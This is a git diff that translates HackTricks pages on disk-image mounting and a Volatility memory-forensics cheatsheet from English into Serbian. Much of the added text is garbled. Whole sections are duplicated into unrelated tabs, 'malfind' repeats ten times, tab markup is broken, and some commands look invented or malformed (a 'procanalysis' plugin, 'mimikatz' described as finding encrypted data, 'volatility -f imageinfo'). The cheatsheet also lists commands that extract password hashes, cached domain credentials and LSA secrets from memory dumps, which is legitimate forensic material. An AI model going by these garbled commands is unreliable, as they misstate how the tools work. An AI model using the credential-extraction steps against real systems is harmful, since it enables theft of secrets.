+Možete generisati sliku diska koristeći [**ewf alate**](https://github.com/libyal/libewf).
```bash
ewfacquire /dev/sdb
#Name: evidence
@@ -57,52 +52,56 @@ ewfacquire /dev/sdb
#Then use default values
#It will generate the disk image in the current directory
```
+## Montiranje
-## Mount
+### Nekoliko vrsta
-### Several types
-
-In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
-
-### Raw
+U **Windows**-u možete pokušati koristiti besplatnu verziju Arsenal Image Mounter-a ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) za **montiranje forenzičke slike**.
+### Sirova
```bash
#Get file type
-file evidence.img
+file evidence.img
evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files)
#Mount it
mount evidence.img /mnt
```
-
### EWF
+EWF (EnCase Evidence File) je popularan format za snimanje slika dokaza. Ovaj format omogućava snimanje slike diska sa svim sektorima, uključujući i neiskorišćene sektore. EWF format takođe podržava kompresiju slike kako bi se smanjila veličina fajla.
+
+Da biste izvršili akviziciju slike diska u EWF formatu, možete koristiti alate kao što su EnCase, FTK Imager ili ewfacquire. Ovi alati omogućavaju snimanje slike diska u EWF formatu sa svim relevantnim metapodacima.
+
+Kada je slika diska snimljena u EWF formatu, možete je montirati kao virtualni disk kako biste pristupili podacima. Za montiranje EWF slike možete koristiti alate kao što su Arsenal Image Mounter, OSFMount ili FTK Imager.
+
+Montiranje EWF slike omogućava vam pregledavanje i analizu podataka na disku bez potrebe za fizičkim pristupom originalnom disku. Ovo je korisno u forenzičkim istraživanjima, jer omogućava sigurno rukovanje dokazima i sprečava moguće oštećenje originalnog diska.
+
+Važno je napomenuti da prilikom akvizicije slike diska u EWF formatu treba biti pažljiv kako bi se osigurala integritet dokaza. Takođe, treba voditi računa o pravilnom rukovanju i čuvanju EWF slike kako bi se očuvala njena autentičnost i integritet.
```bash
#Get file type
-file evidence.E01
+file evidence.E01
evidence.E01: EWF/Expert Witness/EnCase image file format
#Transform to raw
mkdir output
ewfmount evidence.E01 output/
-file output/ewf1
+file output/ewf1
output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files)
#Mount
mount output/ewf1 -o ro,norecovery /mnt
```
-
### ArsenalImageMounter
-It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
+To je Windows aplikacija za montiranje volumena. Možete je preuzeti ovde [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
-### Errors
-
-* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
-* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector:
+### Greške
+* **`cannot mount /dev/loop0 read-only`** u ovom slučaju trebate koristiti zastavice **`-o ro,norecovery`**
+* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** u ovom slučaju montiranje nije uspelo jer je offset fajl sistema različit od offseta slike diska. Morate pronaći veličinu sektora i početni sektor:
```bash
-fdisk -l disk.img
+fdisk -l disk.img
Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
@@ -113,21 +112,18 @@ Disk identifier: 0x00495395
Device Boot Start End Sectors Size Id Type
disk.img1 2048 208895 206848 101M 1 FAT12
```
-
-Note that sector size is **512** and start is **2048**. Then mount the image like this:
-
+Imajte na umu da je veličina sektora **512**, a početak je **2048**. Zatim montirajte sliku na sledeći način:
```bash
mount disk.img /mnt -o ro,offset=$((2048*512))
```
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Da li radite u **cybersecurity kompaniji**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks-u**? Ili želite da imate pristup **najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu**? Proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili me **pratite** na **Twitter-u** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na [hacktricks repo](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
index 6b2f7bc97..a8da3b3f5 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
@@ -2,15 +2,15 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
@@ -18,37 +18,139 @@ Other ways to support HackTricks:
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji kibernetički događaj u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i kibernetičkih profesionalaca u svakoj disciplini.
{% embed url="https://www.rootedcon.com/" %}
-If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
-
+Ako želite nešto **brzo i ludo** što će pokrenuti nekoliko Volatility pluginova paralelno, možete koristiti: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
```bash
python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # It will use the most important plugins (could use a lot of space depending on the size of the memory)
```
-
-## Installation
+## Instalacija
### volatility3
-
```bash
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
python3 setup.py install
python3 vol.py —h
```
+#### Metodologija 1
-### volatility2
+1. **Identifikacija profila**: Pokrenite `volatility2` sa opcijom `imageinfo` kako biste identifikovali profil memorije.
-{% tabs %}
-{% tab title="Method1" %}
+```plaintext
+volatility2 -f dump.mem imageinfo
+```
+
+2. **Izdvajanje procesa**: Koristite opciju `pslist` da biste izdvojili sve procese iz memorije.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil pslist
+```
+
+3. **Analiza procesa**: Analizirajte izdvojene procese kako biste pronašli sumnjive aktivnosti ili tragove napada.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil procanalysis -p PID
+```
+
+4. **Analiza mreže**: Koristite opciju `netscan` da biste pronašli otvorene mrežne veze i aktivnosti.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil netscan
+```
+
+5. **Analiza registra**: Koristite opciju `hivelist` da biste pronašli registarske ključeve u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil hivelist
+```
+
+6. **Analiza datoteka**: Koristite opciju `filescan` da biste pronašli otvorene datoteke u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil filescan
+```
+
+7. **Analiza servisa**: Koristite opciju `svcscan` da biste pronašli pokrenute servise u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil svcscan
+```
+
+8. **Analiza drajvera**: Koristite opciju `driverirp` da biste pronašli drajvere u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil driverirp
+```
+
+9. **Analiza modula**: Koristite opciju `modscan` da biste pronašli učitane module u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil modscan
+```
+
+10. **Analiza tokena**: Koristite opciju `tokens` da biste pronašli informacije o tokenima u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil tokens
+```
+
+11. **Analiza procesa učitavanja**: Koristite opciju `ldrmodules` da biste pronašli informacije o procesima učitavanja u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil ldrmodules
+```
+
+12. **Analiza datoteka učitavanja**: Koristite opciju `ldrmodules` sa dodatnom opcijom `--dump` da biste izdvojili datoteke učitavanja iz memorije.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil ldrmodules --dump
+```
+
+13. **Analiza heša**: Koristite opciju `hashdump` da biste pronašli heširane lozinke u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil hashdump
+```
+
+14. **Analiza šifri**: Koristite opciju `mimikatz` da biste pronašli šifrovane podatke u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil mimikatz
+```
+
+15. **Analiza registra**: Koristite opciju `printkey` da biste pronašli vrednosti registra u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil printkey -K "RegistryKey"
+```
+
+16. **Analiza događaja**: Koristite opciju `evnets` da biste pronašli informacije o događajima u memoriji.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil events
+```
+
+17. **Analiza fajlova**: Koristite opciju `filescan` sa dodatnom opcijom `--dump-dir` da biste izdvojili fajlove iz memorije.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil filescan --dump-dir=/putanja/do/direktorijuma
+```
+
+18. **Analiza registra**: Koristite opciju `printkey` sa dodatnom opcijom `--dump-dir` da biste izdvojili vrednosti registra iz memorije.
+
+```plaintext
+volatility2 -f dump.mem --profile=profil printkey -K "RegistryKey" --dump-dir=/putanja/do/direktorijuma
+```
+
+{% endtab %}
+{% endtabs %}
```
Download the executable from https://www.volatilityfoundation.org/26
```
-{% endtab %}
-
-{% tab title="Method 2" %}
+{% tab title="Metoda 2" %}
```bash
git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
@@ -57,26 +159,26 @@ python setup.py install
{% endtab %}
{% endtabs %}
-## Volatility Commands
+## Komande za Volatility
-Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
+Pristupite zvaničnoj dokumentaciji na [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
-### A note on “list” vs. “scan” plugins
+### Napomena o "list" vs. "scan" pluginovima
-Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes.
+Volatility ima dva glavna pristupa pluginovima, što se ponekad odražava u njihovim imenima. "list" pluginovi će pokušati da se kreću kroz strukture Windows Kernela kako bi dobili informacije poput procesa (lociraju i prolaze kroz povezanu listu struktura `_EPROCESS` u memoriji), OS handle-ova (lociranje i listanje tabele handle-ova, dereferenciranje bilo kojih pronađenih pokazivača, itd). Oni se ponašaju slično kao Windows API kada se zatraži, na primer, lista procesa.
-That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the pslist.
+To čini "list" pluginove prilično brzim, ali jednako ranjivim kao i Windows API na manipulaciju od strane malvera. Na primer, ako malver koristi DKOM da odvoji proces od povezane liste `_EPROCESS`, neće se prikazati u Task Manageru, niti u pslistu.
-“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make`_EPROCESS` objects out of it (it uses pool-tag scanning, which is searching for 4-byte strings that indicate the presence of a structure of interest). The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory (since it still needs to exist for the process to run). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false positives (a process that exited too long ago and had parts of its structure overwritten by other operations).
+"scan" pluginovi, s druge strane, će pristupiti memoriji na način sličan izdvajanju stvari koje bi imale smisla kada bi se dereferencirale kao određene strukture. Na primer, `psscan` će čitati memoriju i pokušati da napravi objekte `_EPROCESS` od nje (koristi skeniranje pool-tagova, što je traženje 4-bajtnih nizova koji ukazuju na prisustvo strukture od interesa). Prednost je u tome što može pronaći procese koji su završili, i čak i ako malver manipuliše povezanom listom `_EPROCESS`, plugin će i dalje pronaći strukturu koja se nalazi u memoriji (jer još uvek mora postojati da bi proces radio). Mana je što su "scan" pluginovi malo sporiji od "list" pluginova, i ponekad mogu dati lažne pozitivne rezultate (proces koji je završio pre dugo vremena i čiji su delovi strukture prepisani drugim operacijama).
-From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
+Izvor: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
-## OS Profiles
+## OS Profili
### Volatility3
-As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\
-Symbol table packs for the various operating systems are available for **download** at:
+Kao što je objašnjeno u readme datoteci, trebate staviti **tabelu simbola OS-a** koji želite podržati unutar _volatility3/volatility/symbols_.\
+Paketi tabela simbola za različite operativne sisteme dostupni su za **preuzimanje** na:
* [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip)
* [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip)
@@ -84,16 +186,13 @@ Symbol table packs for the various operating systems are available for **downloa
### Volatility2
-#### External Profile
-
-You can get the list of supported profiles doing:
+#### Spoljni profil
+Možete dobiti listu podržanih profila koristeći:
```bash
./volatility_2.6_lin64_standalone --info | grep "Profile"
```
-
-If you want to use a **new profile you have downloaded** (for example a linux one) you need to create somewhere the following folder structure: _plugins/overlays/linux_ and put inside this folder the zip file containing the profile. Then, get the number of the profiles using:
-
+Ako želite koristiti **novi profil koji ste preuzeli** (na primer, linux profil), morate negde kreirati sledeću strukturu foldera: _plugins/overlays/linux_ i staviti unutar ovog foldera zip datoteku koja sadrži profil. Zatim, dobijte broj profila koristeći:
```bash
./vol --plugins=/home/kali/Desktop/ctfs/final/plugins --info
Volatility Foundation Volatility Framework 2.6
@@ -105,28 +204,28 @@ LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 - A Profile for Linux CentOS7_3.10
VistaSP0x64 - A Profile for Windows Vista SP0 x64
VistaSP0x86 - A Profile for Windows Vista SP0 x86
```
+Možete **preuzeti profile za Linux i Mac** sa [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles)
-You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles)
-
-In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, and you can use it to execute something like:
-
+U prethodnom odeljku možete videti da se profil naziva `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, i možete ga koristiti da izvršite nešto poput:
```bash
./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan
```
+#### Otkrivanje profila
-#### Discover Profile
+```bash
+volatility -f imageinfo
+```
+Ova komanda će vam pomoći da otkrijete informacije o profilu memorije.
```
volatility imageinfo -f file.dmp
volatility kdbgscan -f file.dmp
```
+#### **Razlike između imageinfo i kdbgscan**
-#### **Differences between imageinfo and kdbgscan**
-
-[**From here**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and the number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it from .
-
-Always take a look at the **number of processes that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** (This is because to extract processes the correct KDBG address is needed)
+[**Odavde**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): Za razliku od imageinfo koji samo pruža predloge profila, **kdbgscan** je dizajniran da pozitivno identifikuje tačan profil i tačnu KDBG adresu (ako postoji više njih). Ovaj dodatak skenira potpise KDBGHeadera povezane sa Volatility profilima i primenjuje provere ispravnosti kako bi se smanjio broj lažnih pozitiva. Opširnost izlaza i broj provera ispravnosti koje se mogu izvršiti zavise od toga da li Volatility može pronaći DTB, pa ako već znate tačan profil (ili ako imate predlog profila od imageinfo), pobrinite se da ga koristite od .
+Uvek pogledajte **broj procesa koje je kdbgscan pronašao**. Ponekad imageinfo i kdbgscan mogu pronaći **više od jednog** odgovarajućeg **profila**, ali samo **validan profil će imati neke procese povezane** (To je zato što je za izdvajanje procesa potrebna tačna KDBG adresa).
```bash
# GOOD
PsActiveProcessHead : 0xfffff800011977f0 (37 processes)
@@ -138,23 +237,20 @@ PsLoadedModuleList : 0xfffff8000119aae0 (116 modules)
PsActiveProcessHead : 0xfffff800011947f0 (0 processes)
PsLoadedModuleList : 0xfffff80001197ac0 (0 modules)
```
-
#### KDBG
-The **kernel debugger block**, referred to as **KDBG** by Volatility, is crucial for forensic tasks performed by Volatility and various debuggers. Identified as `KdDebuggerDataBlock` and of the type `_KDDEBUGGER_DATA64`, it contains essential references like `PsActiveProcessHead`. This specific reference points to the head of the process list, enabling the listing of all processes, which is fundamental for thorough memory analysis.
-
-## OS Information
+**Kernel debugger blok**, poznat kao **KDBG** u Volatility-u, ključan je za forenzičke zadatke koje obavlja Volatility i razni debuggeri. Identifikovan kao `KdDebuggerDataBlock` i tipa `_KDDEBUGGER_DATA64`, sadrži bitne reference poput `PsActiveProcessHead`. Ova specifična referenca pokazuje na glavu liste procesa, omogućavajući prikazivanje svih procesa, što je osnovno za temeljnu analizu memorije.
+## Informacije o operativnom sistemu
```bash
#vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info)
./vol.py -f file.dmp windows.info.Info
```
+Plugin `banners.Banners` može se koristiti u **vol3 da bi se pokušalo pronaći linux banere** u dumpu.
-The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump.
+## Hesovi/Lozinke
-## Hashes/Passwords
-
-Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets).
+Izvucite SAM hesove, [keširane kredencijale domena](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) i [lsa tajne](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets).
{% tabs %}
{% tab title="vol3" %}
@@ -163,9 +259,69 @@ Extract SAM hashes, [domain cached credentials](../../../windows-hardening/steal
./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry
./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispisa u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **driverscan**: Skenira memorijski ispisa u potrazi za drajverima.
+- **devicetree**: Prikazuje stablo uređaja.
+- **registry**: Prikazuje informacije o registru.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hashdump**: Izvlači lozinke iz memorijskog ispisa.
+- **privs**: Prikazuje privilegije za određeni proces.
+- **getsids**: Prikazuje SID-ove za određeni proces.
+- **envars**: Prikazuje okruženje za određeni proces.
+- **cmdscan**: Skenira memorijski ispisa u potrazi za komandama.
+- **consoles**: Prikazuje listu konzola.
+- **screenshots**: Pravi snimke ekrana.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+
+#### Dodatni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-cheatsheet/blob/master/cheatsheets/Volatility%20Cheat%20Sheet.pdf)
```bash
volatility --profile=Win7SP1x86_23418 hashdump -f file.dmp #Grab common windows hashes (SAM+SYSTEM)
volatility --profile=Win7SP1x86_23418 cachedump -f file.dmp #Grab domain cache hashes inside the registry
@@ -174,28 +330,24 @@ volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets
{% endtab %}
{% endtabs %}
-## Memory Dump
-
-The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**.
+## Damp memorije
+Damp memorije procesa će **izvući sve** trenutno stanje procesa. Modul **procdump** će samo **izvući** kod.
```
volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
```
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji događaj u oblasti kibernetičke bezbednosti u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je vrelo mesto susreta tehnoloških i kibernetičkih stručnjaka u svakoj disciplini.
{% embed url="https://www.rootedcon.com/" %}
-## Processes
+## Procesi
-### List processes
+### Lista procesa
-Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\
-It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes.
+Pokušajte da pronađete **sumnjive** procese (po imenu) ili **neočekivane** podprocese (na primer cmd.exe kao podproces iexplorer.exe).\
+Bilo bi interesantno **uporediti** rezultat pslist sa rezultatom psscan kako biste identifikovali skrivene procese.
{% tabs %}
{% tab title="vol3" %}
@@ -204,9 +356,111 @@ python3 vol.py -f file.dmp windows.pstree.PsTree # Get processes tree (not hidde
python3 vol.py -f file.dmp windows.pslist.PsList # Get process list (EPROCESS)
python3 vol.py -f file.dmp windows.psscan.PsScan # Get hidden process list(malware)
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **kpcrscan**: Skenira memorijski ispisa u potrazi za KPCR strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova.
+- **handles**: Prikazuje listu otvorenih ručki.
+- **cmdline**: Prikazuje argumente komandne linije za svaki proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispisa u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **driverscan**: Skenira memorijski ispisa u potrazi za drajverima.
+- **devicetree**: Prikazuje stablo uređaja.
+- **registry**: Prikazuje informacije o registru.
+- **hivelist**: Prikazuje listu učitanih registarskih datoteka.
+- **hashdump**: Izvlači lozinke iz memorijskog ispisa.
+- **mbrparser**: Prikazuje Master Boot Record (MBR) informacije.
+- **yarascan**: Skenira memorijski ispisa koristeći YARA pravila.
+- **vadinfo**: Prikazuje informacije o Virtual Address Descriptor (VAD).
+- **vaddump**: Izvlači sadržaj VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do VAD-a.
+
+#### Primeri korišćenja
+
+- Prikaz informacija o memorijskom ispisa:
+ ```
+ volatility -f memory_dump.mem imageinfo
+ ```
+
+- Prikaz liste procesa:
+ ```
